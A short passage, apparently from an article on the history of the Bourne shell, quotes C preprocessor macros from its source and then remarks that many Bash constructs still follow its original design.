#define SKIP    ;
#define DIV     /
#define REM     %
#define NEQ     ^
#define ANDF    &&
#define ORF     ||

#define TRUE    (-1)
#define FALSE   0
#define LOBYTE  0377
#define STRIP   0177
#define QUOTE   0200

#define EOF     0
#define NL      '\n'
#define SP      ' '
#define LQ      '`'
#define RQ      '\''
#define MINUS   '-'
#define COLON   ':'

#define MAX(a,b)        ((a)>(b)?(a):(b))

Having said all that, the Bourne shell was an awesome achievement; many of the coding constructs we still use in modern Bash scripts, 30 years later, are identical to the original design.